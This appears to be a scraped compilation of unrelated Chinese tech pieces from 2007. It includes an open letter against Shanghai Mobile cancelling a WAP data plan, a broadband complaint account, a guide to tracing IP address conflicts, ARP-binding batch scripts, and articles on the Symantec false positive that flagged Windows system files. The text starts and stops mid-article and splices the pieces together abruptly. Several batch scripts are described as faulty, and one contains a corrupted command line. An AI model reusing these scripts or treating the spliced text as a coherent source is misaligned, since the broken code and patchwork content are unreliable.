　　再次,这一数字游戏式的套餐已经在中国大地上流行了数年之久,唯一的效用便是让我们在使用手机的同时温习了一遍数学题,有一些套餐让人看了数遍都不知所云,直让人后悔当时为啥不在数字运算上多下功夫.简简单单的单向收费为何搞得如此复杂?我想,行业的高额利润令运营商们难以割舍恐怕是问题背后的实质.正如民谚所说:“让狼把嘴里的肉吐出来并不容易”.

　　对于单向收费,我们已经期待了十多年,为了得到“正果”,再等些时间我们也认了.只是请这些条款的制造者不要再拿这些“套餐”说事了,用数字游戏来考验我们的智商并不好玩,只会激起更大不满情绪.一句话,广大消费者要的单向收费,就是直接、简单的接听免费.至于现在披着“单向收费”外衣的所谓“优惠”,显然不是消费者想要的真优惠.看来,单向收费也有个真假问题,由此,相应的打假工作仍旧任重道远.

关于WAP套餐问题致上海移动的公开信

关于WAP套餐问题致上海移动的公开信

文曲星网友通过本站向中国移动通信、国家信息产业部、上海通信管理局、上海移动通信有限公司、部分平面媒体及众多网络媒体发公开信

目的是为了让有关部门了解此事,正面的考虑此次事件,广大消费者也应该理智的应对.如果有不是很正确、合理的想法,热切希望指出.移动通信的飞速发展离不开移动运营商的积极努力和广大用户的支持.含公开信全文,详细叙述了事件全过程并解释了相关的问题,欢迎各位网友广泛转载.

致上海移动的公开信

--关于20元WAP包月套餐之问题

信息产业部各位领导、上海移动各位领导、广大手机上网用户，大家好：

近日，手机上网、互联网的各大网站、论坛中，众多网友集体声讨上海移动公司最近的一项举措，纷纷写信、去电国家信息产业部、上海通信管理局、上海移动通信有限公司、部分平面媒体及众多网络媒体，投诉上海移动单方面强制性取消20元Wap包月套餐。

在这之前有必要再介绍一下部分名词。

GPRS： 即“通用分组无线业务”（General Packet Radio Service的英文简称），是在现有GSM网络上开通的一种新型的分组数据传输技术。可为您实现诸如：电子邮件、电子商务、移动办公、网上聊天、基于 WAP的信息浏览、互动游戏、FLASH画面、多和弦铃声、PDA终端接入、综合定位技术等，从而带您进入一个动感而彩色的移动世界，引领您尽快迈向3G 时代。（选摘自上海移动GPRS业务介绍 http://www.sh.chinamobile.com/no ... robject1ai1190.html ）

WAP：WAP 是一种无线应用协议，是一个全球性的开放协议。WAP定义可通用的平台，把目前Internet网上HTML语言的信息转换成用WML描述的信息，显示在 移动电话或者其他手持设备的显示屏上。多种网络，也就是说，它不依赖某种网络而存在，今天的WAP服务在3G到来后仍然可能继续存在，不过传输速率更快， 协议标准也会随之升级。

接入点：APN(Access Point Name)，即“接入点名称”，用来标识GPRS的业务种类，目前分为两大类：CMWAP(通过GPRS访问WAP业务)、CMNET（除了WAP以外的服务目前都用CMNET,比如连接因特网等）。（选摘自上海移动GPRS设置 http://www.sh.chinamobile.com/no ... serobject1ai41.html ）

是什么引起这次人数众多的声讨？

中国移动通信集团上海有限公司在2007年5月21日，在其官方网站上帖出如下公告(原文GPRS20元WAP套餐公告 http://www.sh.chinamobile.com/no ... robject1ai1817.html ）（见附图一）：



(附图一)

收集了大多数网友对此的看法，结合笔者想法归纳如下：

1.上海移动违法了相关法律，侵犯了用户的合法权益！

在《中华人民共和国电信条例》的第三章第四十一条中明确：“电信业务经营者在电信服务中，不得有下列行为：以任何方式限定电信用户使用其指定的业务；违反国家规定，擅自改变或者变相改变资费标准，擅自增加或者变相增加收费项目；对电信用户不履行公开做出的承诺或者作容易引起误解的虚假宣传；”， 据此规定，上海移动只是提前10天在其网站告知了广大用户，而未对取消套餐是否合法作出明确的解释。此外用户选择了套餐，使用提供服务，实质上已经构成了 合同关系，有移动发来的确认短信(参见附图二)，依据《中华人民共和国合同法》第二章第十条。用户每月按时付费，进行消费，作为消费者，有权对于服务提供 商擅自取消提供的服务提出异议，依据《中华人民共和国消费者权益保护法》第二章第八、九条，第三章第二十三条，第二十四条。



（附图二）

2.上海移动群发给WAP包月用户的短信，存在误导的嫌疑。

移动此次针对的是20元WAP包月套餐用户，上海移动向部分包月套餐用户发送了短信，内容见附图三，短信中的B选项是GPRS20套餐，很多不是很关注资 费调整的用户误认为这就是当前使用的包月套餐而回复了B，事后才知道这个“GPRS20套餐”≠“GPRS20元WAP套餐”，而是20元包含50兆流量 的套餐，明显有误导的用户的嫌疑，试问为何不在B选项后像A选项一样在括号后增加流量说明，难道怕用户得知资费的巨大差距后就没人转换了？



（附图三）

3.取消套餐是否合理？移动难道要过河拆桥！？

公告中称“手机上网方式从原来的CMWAP为主发展到目前的CMWAP和CMNET兼有，使GPRS20元WAP套餐客户不易辨别是以CMWAP方式接入还是以CMNET方式接入。”

手机上网的老用户都清楚的记得，以前手机上网是项比较奢侈的服务。几年前上海移动就存在了CMWAP和CMNET，而不是最近才有的。上海移动自2005年2月起(20元包月套餐推出时宣传页面历史存档 http://web.archive.org/web/20050 ... motion/20050118.htm ）至2007年4月25日止。该套餐已正常开展了2年多的时间。这期间培养了众多手机上网的忠实用户，促进了我国移动数据业务的快速发展，为我国正在大力部署的3G网络带来潜在用户群体。

2年多过去了，手机上网的技术变的更加成熟，相应的运营成本也有了大幅降低，使得像随E行等cmnet业务的资费下降后能被大多数移动办公商务人士接受。 但此次的移动强制取消行为却使得数量众多的手机上网cmwap为主的用户在取消套餐后不得不付出更多的话费。难道技术的改进更新带来的话费的增加？难道移 动要抛弃那些忠实的手机上网用户？

笔者承认移动对20wap套餐介绍中已告知只能用于cmwap接入，cmnet上网会有额外的费用，仅管如此还是有些不熟悉手机操作的用户误上cmnet 而被扣费，但是这个不能作为取消该包月套餐的依据。打个比方，有些人不清楚手机的操作，误拨打长途电话而付出了更多的费用，你们为此向用户提供可以自由选 择是否限制拨打长途（官方功能介绍 http://www.sh.chinamobile.com/no ... robject1ai1185.html ），而不是取消所有人的长途功能，或统一本地、长途和漫游的资费标准。难道你们就不能从方便用户的角度出发，从技术上解决自由关闭开启cmwap/cmnet功能。

再看看附图四，这个官方资费说明（ http://www.sh.chinamobile.com/no ... serobject1ai45.html ）中，还有个5元的上网套餐，为何不说也把他升级呢？上海移动公司目的何在？



（附图四）

4.移动所谓的“不区分”套餐好吗？实为变相提高收费。

关心GPRS上网资费的，知道上海移动其实早在2006年4月就已经推出了不分CMWAP和CMNET的套餐资费（ http://web.archive.org/web/20060 ... serobject1ai45.html ），如果真的用户需要，早就选择了这个套餐。

再说，4月起，上海移动将GPRS网络升级到了EDGE网络，引用上海移动官方说法（增强型GPRS，手机应用更多彩！ http://www.sh.chinamobile.com/no ... robject1ai1820.html ） “增强型GPRS即增强型数据速率GSM演进技术，是一种从GSM到3G的过渡技术，能提比GPRS更快的网络传输速率。目前，中国移动上海公司 EGPRS第一阶段网络铺设工作已经基本完成。近期，请密切关注您的手机，一旦发现屏幕上方信号标示区域内出现了“E”的符号，这就表明您的手机和您此时 所处的区域支持增强型GPRS（手机自动刷新），能实现更流畅的在线游戏、手机炒股、手机电视等精彩体验（资费不变，仍按原GPRS标准资费收取），率先体验精彩的手机娱乐新生活！”。

大多数人都知道的基本常识，数据传输数据加快，那么在相同时间内数据流量就相应增加，对于50MB的流量，使用完的速度也加快了，超出流量后那么按每KB计算，这超出的资费也加快增长。50MB能干些什么呢？如果只是看看文本、图片，需要提升网络速度吗？

科技以人为本。移动做到了没有？

5.通信发展给我们带来了什么？手机业务使用发展严重受阻力！

无线通信发展带来的好处已经深入到每个角落，尤其3G网络的前期效应已展现给每个人的面前。手机已经不是简单的短信、通话工具。带给人们的是更多的通讯体 验。很多服务已经开始商用，比如手机聊天、手机电视、手机邮箱。其中手机电视尤其吸引普通消费群体。这正是得益于“由于移动通信网络技术升级和手机功能的 增强”。

随着全球3G商用进程的日益推进，手机电视业务受到了业界的广泛关注。近几年来，全球一些移动运营商相继推出了手机电视业务，他们大多采用的是基于蜂窝网 络的流媒体技术（选载自全球手机电视技术及业务分析）。移动推出的手机电视业务正是基于GPRS的多媒体应用。目前已经有“CCTV手机电视”、“东方手 机电视”（即梦视界）等多个栏目，大家通过移动梦网首页链接就能进入手机电视业务。下面附图五截图是取自上海移动手机电视梦视界官方资费介绍 http://www.sh.chinamobile.com/motv/10.htm 。

10元的包月费就能收看点播栏目中的所有频道和内容，比起业务发展之初的几十元资费降低了不少。但是如果移动要取消WAP包月套餐的话，按流量计费的手机 电视，估计很少有人能承担的起这巨额的数据流量费(0.03元/KB)。目前每月消费通信费20元加相应功能费就能用得起的手机电视，一下子变为高贵的奢 侈品，无形中增加了消费门槛，提高了资费，阻碍的手机通信多媒体发展的应用和健康发展。



（附图五）

笔者做了下实验（附图六），收看移动梦网中的CCTV新闻频道10分钟，选择“清晰播放”，手机就使用掉了近2.5MB流量，“高清播放”流量更大，如果我真不用WAP包月的话，这还怎么看？



（附图六）

不知移动的管理层、决策层是否考虑过绝大多数的用户消费水平。是想通过取消现有套餐来增加收入，还是来降低手机电视的运营成本，这样的改革对用户肯定是没有道理的，也是不公平的。

6.资费调整，是否听取了广大用户的建议？

上海作为国际大都市，很多地方都应该起带头作用的。

据笔者了解，上海移动在贴出公告之前，没有做过市场调查，对于此次决策，没有认真的从消费者角度进行考虑。因此方案一出，立即受到广大用户的强烈反响。上 海移动的客服电话10086的人工服务很难接通，几大315投诉网站的首页也都是上海移动用户对于取消20元WAP包月的投诉反应，不知道上海移动的高层 领导有没有什么感觉，下级部门有没有因为同样内容投诉的业务量的异常增加而向上级汇报?领导有没有调查考虑过问题的原因？我想作为一个国际排名靠前的大企 业，上海移动公司不会不理会众多消费者的权益维护吧。

写这封信的目的是为了让有关部门了解此事，正面的考虑此次事件，广大消费者也应该理智的应对。如果有不是很正确、合理的想法，热切希望指出。

移动通信的飞速发展离不开移动运营商的积极努力和广大用户的支持。

撰写：文曲星 2007年5月23日

上海移动单方面违约取消WAP20元套餐引众怒 315投诉网爆棚

2007年5月21日,上海移动发布《GPRS 20元WAP套餐公告》,终于动手强制取消WAP的流量包月服务,取消后20元套餐将只能使用50M的流量,中国移动上海公司的套餐长期用户,自办理本套餐起,已与中国移动上海分公司达成了双方面协议,在此期间中国移动公司从未表明此协议将会于近日作废.因此构 成了单方面撕毁合同的违法行为,并且,移动公司为了安抚利益受损的用户,给出了两项可以称之为“蝇头小利”的措施:以返还20元话费为诱饵,骗使用户自愿退订这个套餐；把合并cmwap与cmnet端口称之为"网关升级".

此举引发了消费者的强烈愤慨和抗议,315投诉网出现了连续十多页投诉上海移动霸王行径的场面[内含相关页面],cnBeta将继续对这一情况进行关注.



附上海移动强制取消20元WAP包月套餐

投诉济南网通至国家信息产业部的过程以及最后处理结果

2007年五一节间，去网通营业厅交纳宽带费用时，被告知，已被强制改成50元月。询问原因，营业员答复网通宽带已经升级；问升级内容，答复在原宽带业务中增加了江民杀毒，宽带中国业务费。因本人有杀毒软件，同时并不需要任何宽带中国的业务，所以告诉网通营业人员本人并不需要附加业务，只需要上宽带。被告知，要想用网通的宽带这附加业务就是必须要的。 联系到青岛一网友一篇投诉青岛铁通宽带至国家信息产业部及其处理结果的帖子，我也就此问题到国家信息产业部进行了投诉。注意：投诉就要光明正大，要务必填写真实信息（电话），信息产业部的工作人员会打你的电话号码主动联系你核实情况的！） 国家信息产业部投诉地址:http://www.mii.gov.cn/module/leadmail/leadmail.jsp

大约十多天(包括五一假期)，我接到网通客服10060打来的电话，用非常纤细和客气的声音向我解释情况，其中有一段解释说是应广大用户要求对宽带进行升级，我立即反问到，难道广大用户要求你们禁止使用路由？客服又跟我解释说，前段时间确实有很多用户反应这个问题，并且有很多用户因此停止使用网通宽带， 现在网通跟当地安全部门协商并考虑到人们生活水平确实普遍提高，很多家庭用户拥有一台以上的计算机，因此以后家庭用户可以允许不超过两台的计算机共享上网。

除此之外，客服还询问过我两次我的宽带帐号和我的住址，说是帮我解决问题，我当时推辞说我在外面，宽带帐号忘了（因为我现在就是用路由共享的同学的一个宽 带上网的，去年用过十个月的宽带，到期后就没再续费。）询问我的地址是因为会有专门的网通服务人员上门找我签字，反馈对此问题解决的满意程度。

前天网通上再次打电话预约时间，约好今天下午，今天下午，济南网通两位所在地区客户经理（女）亲自到我所在学校宿舍让我签字，其中处理意见竟是一份印的比 较粗糙的表格，处理意见一项是空的。意思是先让我签字，尽管她们非常礼貌的说让我签了算了，我当然不干，说把处理意见写明之后再签，于是两人又出去把处理 意见补齐了回来，我才签字。期间再次跟她们询问关于路由共享的问题，她们再次说可以保证家庭用户可以另带一台机器，即通过路由或共享方式限不超过两台的机器用一账号共享上网。

在此也请广大用户共同监督。包括其他运营商，一味的反对、谩骂、抵制是没有用的。要解决就要找最高级部门。

最后，也希望各位来CB的朋友，多一份文明用语，多一份考虑和讨论，多一份解决问题的方法。让CB不仅是我们了解业界的窗口，更希望CB是我们共同讨论，学习，解决问题的平台。

IP地址冲突简单查找方法与预防管理策略

IP地址冲突简单查找方法与预防管理策略

对于在Internet和Intranet网络上，使用TCP/IP协议时每台主机必须具有独立的IP地址，有了IP地址的主机才能与网络上的其它主机进行通讯。随着网络应用大力推广，网络客户急剧膨胀，由于静态IP地址分配，IP地址冲突的麻烦相继而来。IP地址冲突造成了很坏的影响，首先，网络客户不能正常工作，只要网络上存在冲突的机器，在客户机上都会频繁出现地址冲突的提示：“如果网络上某项应用的安全策略（诸如访问权限，存取控制等）是基于IP地址进行的，这种非法的IP用户会对应用系统的安全造成了严重威胁。

分析原因

出现问题有时并不能及时发现，只有在相互冲突的网络客户同时都在开机状态时才能显露出问题，所以具有相当的隐蔽性。分析原因有如下几种情况可以造成IP地址冲突。

很多用户对TCP/IP并不了解，不知道“IP地址”、“子网掩码”、“默认网关”等参数如何设置，有时用户不是从管理员处得到的上述参数的信息，或者是用户无意修改了这些信息；

管理员或用户根据管理员提供的上述参数进行设置时，由于失误造成参数输错；

在客户机维修调试时，维修人员使用临时IP地址应用造成；

有人窃用他人的IP地址。

查找与解决方法

接到冲突报告后，我们首先确定冲突发生的VLAN。通过IP规划的VLAN定义，和冲突的IP地址，找到冲突地址所在的网段。这对成功地找到网卡MAC地址很关键，因为有些网络命令不能跨网段存取。

首先将客户机与网络隔离，让非法的IP地址的微机在网上运行，网管员便可以设法找到它了。应用网络测试命令有ping命令和arp命令。使用ping命令，假设冲突的IP地址为10.119.40.40，在msdos窗口，命令格式如下，其中斜体部分是命令结果。

　　c:widows〉ping 10.119.40.40

　　request timed out

　　reply from 10.119.40.40 : bytes=32 time〈1ms ttl=128 略

我们之所以要ping这台机器，是出于两个目的，首先我们要知道我们要找的机器确实在网络上，其次，我们要知道这台机器的网卡的MAC地址，那么我们如何知道它的MAC地址哪？这就需要使用第二个命令arp：arp命令只能在某一个VLAN中使用有效，它是低层协议，并不能跨路由。

　　c:widows〉arp -a

　　interface: ...... on inerface ......

　　internet address/physical address/type

　　10.119.40.40/00-00-21-34-63-56/ dynamic 以下略

以上列表表示出冲突IP地址10.119.40.40 处网卡的MAC地址为00-00-21-34-63-56。接下来我们要找的是MAC地址为00-00-21-34-63-56的网卡的具体物理位置。

网络简介中已经说明，每台客户机的网卡直接连接到第二级交换机上，接下来面对大量的以太网交换机，我们要查找是冲突MAC所对应交换机端口。本网络中与客户连接的设备是bay的303/304，本文以303为例，描述如何查找某一个MAC地址所在的端口位置。bay303的网管有多种方式，下面仅以web浏览器方式描述查找非法MAC的方法。

在查找之前，首先要确定VLAN内的交换机位置，查出这些交换机的IP地址，使用交换机地址可以访问该交换机的网管信息。

在网管员的机器上启动浏览器

键入交换机的IP地址

提示登陆信息后输入用户名和密码

进入“mac address table”选项

　　 显示表格如下：

index/mac address/learned on port/learning method/filter packets to this address

00:00:21:34:63:56 13 dynamic no

-------------------------------------------

00:00:81:65:c3:a0 n/a static no

-------------------------------------------

00:00:a2:f7:c3:e4 25 dynamic no

-------------------------------------------

00:00:21:34:63:56 2 dynamic no

以下略。

此时你可以看到索引的第4项，它正是我们要查找的MAC地址，它的端口号为2。根据综合布线资料，可以查找出相应的信息点的物理位置，从而定位到所连接的微机位置。当然，在此是针对特有的交换机所举的例子，在实际工作中我们要查找很多台交换机，才能找到我们要找的MAC地址，当VLAN中存在大量的交换机时，我们需要在这些交换机中逐个去查找，直到找到为止，这是一个相当烦琐的事情。

对于某一交换机的端口中存在下联交换机的情况，因为交换机支持多个MAC地址，会在上级的MAC表中有下级MAC的记载，所以首先查找上级交换机MAC表，确定较具体位置后再去查找下一级交换机，这样会大幅度地缩减查找范围。

当然使用专业的网络测试仪可以更快速简单地排除故障，但对于没有昂贵仪器的小型网络的管理者，上述的方法还是很奏效的。

管理策略

对于局域网来讲此类IP地址冲突的问题会经常出现，用户规模越大，查找工作就越困难，所以网络管理员必须深思加以解决。目前有两种方案，一是使用动态IP地址分配（dhcp），另一种方案是使用静态地址分配，但必须加强MAC地址的管理。

用动态IP地址分配（dhcp）的最大优点是客户端网络的配置非常简单，在没有管理员的帮助和干预的情况下，用户自己便可以对网络进行连接设置。但是，因为IP地址是动态分配的，网管员不能从IP地址上鉴定客户的身份，相应的IP层管理将失去作用。而且使用动态IP地址分配需要设置额外dhcp服务器。

使用静态IP地址分配可以对各部门进行合理的IP地址规划，能够在第三层上方便地跟踪管理，如果我们通过加强对MAC地址的管理，同样也会有效地解决这一问题。

在网络用户连网的同时，建立IP地址和MAC地址的信息档案，自始至终地对局域网客户执行严格的管理、登记制度，将每个用户的IP地址、MAC地址、上联端口、物理位置和用户身份等信息记录在网络管理员的数据库中。试想，在我们上述的案例中，如果知道了非法用户的MAC地址后，我们可以从管理员数据库中进行查寻，如果我们对MAC地址记录全面，我们便可以立即找到具体的使用人的信息，这会节省我们大量宝贵时间，避免大海捞针的烦恼。同时我们对于某些应用应避免使用IP地址来进行权限限制，如果我们从MAC地址上进行限制相对来说要安全的多，这样可以有效地防止有人窃取IP地址的侥幸行为。

ARP防御之双绑批处理+++集合

一：此批处理有缺陷，有时不能实现真正意义的双绑！

@echo off

::读取本机Mac地址

if exist ipconfig.txt del ipconfig.txt

ipconfig /all >ipconfig.txt

if exist phyaddr.txt del phyaddr.txt

find "Physical Address" ipconfig.txt >phyaddr.txt

for /f "skip=2 tokens=12" %%M in (phyaddr.txt) do set Mac=%%M

::读取本机ip地址

if exist IPAddr.txt del IPaddr.txt

find "IP Address" ipconfig.txt >IPAddr.txt

for /f "skip=2 tokens=15" %%I in (IPAddr.txt) do set IP=%%I

::绑定本机IP地址和MAC地址

arp -s %IP% %Mac%

::读取网关地址

if exist GateIP.txt del GateIP.txt

find "Default Gateway" ipconfig.txt >GateIP.txt

for /f "skip=2 tokens=13" %%G in (GateIP.txt) do set GateIP=%%G

::读取网关Mac地址

if exist GateMac.txt del GateMac.txt

arp -a %GateIP% >GateMac.txt

for /f "skip=3 tokens=2" %%H in (GateMac.txt) do set GateMac=%%H

::绑定网关Mac和IP

arp -s %GateIP% %GateMac%

arp -s 网关IP 网关MAC

exit

这个批处理要查询本机的ARP 缓存表，看里面是不是有网关的IP和MAC，有则能成功

绑定，但是没有的话就绑不定了！！！不过可以改进一下，达到双绑的目的，比如

加上arp -s 网关IP 网关MAC一行就可以了。。。

二、这个也不能实现真正意义的双绑，只能绑定本机IP和MAC

（多谢中国DOS联盟lxmxn提供）

@echo off

for /f "delims=: tokens=2" %%a in ('ipconfig /all^|find "Physical Address"') do set local_mac=%%a

for /f "delims=: tokens=2" %%a in ('ipconfig /all^|find "IP Address"') do set local_ip=%%a

for /f "delims=: tokens=2" %%a in ('ipconfig /all^|find "Default Gateway"') do set gate_ip=%%a

fo* /* %%* in ('getmac /nh /s %local_ip%') do set gate_mac=%%a

arp -s %local_ip% %local_mac%

arp -s %gate_ip% %gate_mac% （这个地方有问题，改进中……）

经测试，此批处理不能绑定网关IP和MAC，只能绑定本机IP和MAC

三、这个还不是很清楚，我要测试才行的，目前所知也能绑定本机IP和MAC

（多谢中国DOS联盟everest79提供）

@ECHO OFF

SETLOCAL ENABLEDELAYEDEXPANSION

for /f "tokens=2 delims=[]=" %%i in ('nbtstat -a %COMPUTERNAME%') do call set local=!local!%%i

for /f "tokens=3" %%i in ('netstat -r^|find " 0.0.0.0"') do set gm=%%i

for /f "tokens=1,2" %%i in ('arp -a %gm%^|find /i /v "inter"') do set gate=%%i %%j

arp -s %gate%

arp -s %local%

arp -s 网关IP 网关MAC

这个批处理可以绑定网关IP和MAC，但是还是有缺陷，要依赖于本机上存在的ARP缓存！

改进方法为在最后加一个arp -s 网关IP和MAC!

四、这个是一个兄弟的博客上找到的，原理和第一个一样,只是改进了一点点！

这个P通过ping网关三次得到了网关的MAC其实以上的批都可以通过这个来搞定网关的IP和MAC，

但是如果开机的时候正在发生ARP欺骗的话 这样你绑的IP和MAC就是错的，不能上网了。。

不过这种情况很少，发过来试一下先吧！

@echo off

:::::::::::::清除所有的ARP缓存

arp -d

:::::::::::::读取本地连接配置

ipconfig /all>ipconfig.txt

:::::::::::::读取内网网关的IP

for /f "tokens=13" %%I in ('find "Default Gateway" ipconfig.txt') do set GatewayIP=%%I

:::::::::::::PING三次内网网关

ping %GatewayIP% -n 3

:::::::::::::读取与网关arp缓存

arp -a|find "%GatewayIP%">arp.txt

:::::::::::::读取网关MAC并绑定

for /f "tokens=1,2" %%I in ('find "%GatewayIP%" arp.txt') do if %%I==%GatewayIP% arp -s %%I %%J

:::::::::::::读取本机的 IP+MAC

for /f "tokens=15" %%i in ('find "IP Address" ipconfig.txt') do set ip=%%i

for /f "tokens=12" %%i in ('find "Physical Address" ipconfig.txt') do set mac=%%i

:::::::::::::绑定本机的 IP+MAC

arp -s %ip% %mac%

:::::::::::::删除所有的临时文件

del ipconfig.txt

del arp.txt

exit

以上P可以配合路由上对客户机的IP和MAC进行绑定实现完全防ARP，只是单绑下面机和网关IP及MAC

没有多大用处，关于路由上面的，因为大家用的路由不一样，所以这个就不写了！

揭秘：追本溯源杀毒软件为何会出现误杀

揭秘：追本溯源杀毒软件为何会出现误杀

作者：金山　来源：赛迪网

5月18日，一场突如其来的诺顿误报事件波及了中国数百万电脑用户，一时间，各大媒体纷纷报道，网络上关于杀毒软件误报的讨伐声也不绝余耳。

5月19日，在事件发生的十几个小时后，诺顿发表公开声明，并公布了本次误报问题的解决方案，事件尘埃落地。

然而这场被反病毒专家称为“近5年来最大的误报”事件，是否就这样结束？误杀到底是如何产生的？能否避免？类似的误杀事件是否可能再次发生？一系列的问题都还没有答案。

误报是如何产生的？

误报是杀毒软件最忌讳的事情，也是难免的，但在有保证的情况下，是可以最大限度的去避免误报。

金山毒霸反病毒专家戴光剑表示，误报的产生主要有两种原因：一是鉴定错误，把正常文件误认为病毒。比如一个网管软件，有病毒分析员收集到这个文件后，分析认为其存在不安全行为，就极有可能并将判定为病毒；二是病毒特征提取错误引起的误报。如果工程师在提取病毒特征时，因疏忽而提取错误。比如病毒一般是用高级语言编写，如果疏忽提到了该编译器的部分特征，就可能出现将使用该语言编写的所有程序判断为病毒，此次诺顿误报事件就是将简体中文版Winxp sp2的 NetSpi32.dll 和 LsaSrv.dll判定为病毒所致。

人非圣贤，孰能无过？但作为一个国际知名的杀毒软件出现将系统文件判定为病毒这种严重的误报问题，确实需要反思一下。

是突发事件，还是早有隐患？

其实，误报问题在杀毒软件中时有发生，尤其是一些国外的杀毒软件，由于一些操作机制的问题，发生误报的几率要高于国内的杀毒软件。

2001年诺顿“误报”瑞星2002版杀毒软件带“欢乐时光”病毒；2006年卡巴斯基误报金山词霸为病毒；同年，误报QQ2006正式版和QQ游戏2006为木马病毒；2007年卡巴斯基提示暴风的升级模块是木马，造成大部分用户无法正常使用暴风影音；2007年趋势误报联众客户端为病毒等等。

既然误报问题并非技术难题？为什么同样的错误一再发生？而且这些被误报的软件均是很受国内用户欢迎的应用软件。问题又出在哪里呢？

金山毒霸反病毒专家戴光剑给出了答案，“各大杀毒厂商通常会不断的从用户、互联网中收集大量的程序和软件，其中最重要的就是各种操作系统，形成一个巨大的误报库，通常这个库多达几百个G的容量。在十几台专用误报测试服务器的速度保证下，完成当次病毒库的测试工作。与国内杀毒软件相比，国外产品对中国软件的收集不足，误报库不全面。”

而此次诺顿误报简体中文版Winxp sp2系统文件为病毒的根本原因，正是因为没有将中文版的操作系统文件加入到误报库中。

如何避免误报？

诺顿误报事件已经告一段落，但没人会知道明天是否再会发生类似的事件，误报问题是否有根本的解决办法呢？

戴光剑指出，各大杀毒厂商在防止误报方面都在进行着积极的努力，以金山毒霸为例，采取了很多积极的措施来最大限度的减少误报的可能。

首先，金山毒霸的病毒库的制作升级过程需要有病毒库制作、病毒库测试、病毒库升级三个过程来进行，并使用专门的小组来负责；

其次，金山毒霸在对可疑样本文件进行鉴定时，是通过了有效的白名单过滤机制，再通过二次人工鉴定方法来确认病毒样本的可信性，这是为了有效的确认样本文件确为病毒，排除误鉴定的问题。提取病毒特征的方法上我们进行了多年的经验积累，已经可以有效的避免提到非病毒特征的位置。将病毒特征制作成最后的病毒库。

再次，在病毒库测试阶段又分为病毒查杀有效性测试和误报测试，有专人维护，不停的从互联网和用户手中收集各类程序来扩充。

最后，将测试完毕的病毒库放给用户升级。金山毒霸每周17次升级，每次升级前都会用最新制作的病毒库扫描这个庞大的误报库，如果在鉴定和提取特征时出现失误，也基本会在误报库测试中发现并即时修正。

互联网的迅猛发展，人们对网络的依赖程度越来越高，网络银行、网络炒股、网络查询等等，人们的生活开始日益网络化。然而面对蠕虫、木马、黑客的频繁入侵，人们对杀毒软件的需求也日益强烈。用户越多，杀毒厂商的责任就越大，任何无视用户利益的行为必将遭到用户的质疑。

我经历的Symantec病毒定义码事件及思考

作者：阿利　来源：赛迪网

9:00多

领导说他的机器出问题了，Symantec AntiVirus不停地报netapi32.dll和lsasrv.dll是病毒，但从网上搜索，都说这两个文件是正常的Windows系统文件。重启系统蓝屏，提示信息为：

STOP:C000021a hard error

Unknown hard error

根据一般系统系统维护经验，病毒是很有可能伪装成正常文件的，所以对领导说的那两个文件是系统文件我没当回事。蓝屏不能启动嘛，按照先软后硬的顺序，重装系统，还不行的话再分析硬件。好在以前系统用联想的一个类似一键还原的工具做过备份，所以恢复系统很容易。重装前好备份C盘有用的数据，好在领导有把数据放在除C以外的分区的习惯，所有只有桌面上的一些WORD文件需要备份。用“深山红叶”启动后，备份工作很快完成，随之的系统还原也几分钟就完成了。看来是软件问题，“hard error”不是“硬件故障”。

本以为这只是个案，没想到接下接到接二连三的电话，报告类似的问题，这下我有点蒙了。

10:00

收到了上级部门9：35用邮件发来的紧急通知：

现在网上正在爆发新病毒，病毒名字为：Backdoor.Haxdoor。

用symantec查杀病毒时出现Backdoor.Haxdoor病毒。Symantec操作删除失败，隔离失败。病毒关联文件

是C:\windows/system32目录下netapi32.dll文件。重启系统后出现蓝屏，错误提示为：

STOP:C000021a hard error

Unknown hard error

安全提示：如出现此类情况，

1、不要重启系统。

2、暂时不要升级symantec病毒定义码。

3、暂时不要使用symantec查杀系统。

网络安全组正在寻求查杀解决办法，请耐心等待最新通知后再进行查杀。

看来很严重啊，可为什么我们办公室的电脑都没事呢？与上级部门电话联系后得知，出现这一问题的原因与最新的病毒定义码有关，也就是“2007-5-17 rev18”这个病毒定义码。我一看我的病毒定义码是2007-5-16，哈，这就可以放心了。我赶紧把我能控制的服务器组的病毒定义码都改为“2007-5-16”，SAV这一点不错，可以保留最近三天的病毒定义码，并能选择。我所在的服务器组的病毒定义码为什么没有更新到“2007-5-17”呢？这是因为前一段时间我刚把病毒定义码的更新源改为上级部门的服务器，原来都是直接指向Symantec公司的服务器的。上级部门服务器的病毒定义总是慢一二天，我一直不知道他们是故意这么做的还是有什么原因，没想到这次这慢半拍的病毒定义倒是发挥作用了。

我在服务器上没有设置客户端的“调度更新”和“LiveUpdate”，这样如果有的人自己设置了，就会单独到Symantec公司服务器上更新病毒定义，就会中招。这就是我们这里同样是使用SAV，有的人出现问题，有的人就没事的原因。想到这里，我赶紧在SSC中把客户端的这两项功能都锁死。

12:40

收到了上级部门给出的解决方案，方案中的一些措施，比如在SSC中回复到以前的病毒定义码，这些我都做了。对报病毒的情况，要求不要重启，继续等待。对已重启蓝屏电脑提出了用Windows PE光盘启动，恢复netapi32.dll，lsasrv.dll两个文件，删除SAV2007-5-17病毒定义的办法。并给出了一个包含上述操作批处理文件的Windows PE光盘ISO文件。

我立即把这些内容放到我负责的一个防病毒专题网站上，并开始着手试着恢复机器。由于我有深山红叶光盘，所以我没刻盘，直接用深山红叶试着修复，并获得了成功。

13:30

收到了上级部门给出的更详细的解决方案。我也同样更新了专题网站里的内容。

下午按照这些方案不停地恢复机器。大部分都获得了成功。但有的机器并不是蓝屏，而是不停重启，恢复了那两个文件，删掉了2007-5-17的病毒定义码也没有效果。情急之下，我用Windows XP系统盘修复系统的模式安装了一遍，这下能启动了，但花费了不少时间。

16:40

上级部门告之：没重启的电脑把病毒定义升到“2007-5-17 rev 71”，然后把隔离区的那两个文件恢复即可。

2007年5月19日，20日(周六周日)

继续不停地有电话要求恢复系统，痛苦。

2007年5月21日

在网上看到了Symantec的官方解释。网上转载有这样的句子“对于由此给用户带来的不便，我们深表歉意。”但我看到的是：“对于由此给用户带来的不便。”删掉了“深表歉意”，而不管句子是否通顺。到了下午，内容又发生了变化，主要强调Symantec响应速度是如何之快，如何负责任，而不提用户会有怎样的感受。

引发思考

这次事件给企业信息安全人员提出了新的课题，如何保证在各种突发安全事件中保证企业的信息安全？我有几点体会，

一是备份的重要性

我们领导的机器由于做过系统备份，所以恢复很容易。这个是老生常谈了，这次又得到了验证。

二是病毒定义码的安全性问题

其实这不是一个新问题，杀毒软件会造成误杀和漏杀，这是人所共知的。漏杀造成的危害人们关注的多，但由于误杀造成危害的先例很少，所以一直没有引起足够重视。这次事件可以做为一个经典案例，给人们敲响警钟。越是重要的系统，部署病毒定义码前越是应该进行测试。SAV保留三个病毒定义码可以由管理员来选择，也是基于这个道理。

三是由病毒定义码扩展到操作系统等的补丁

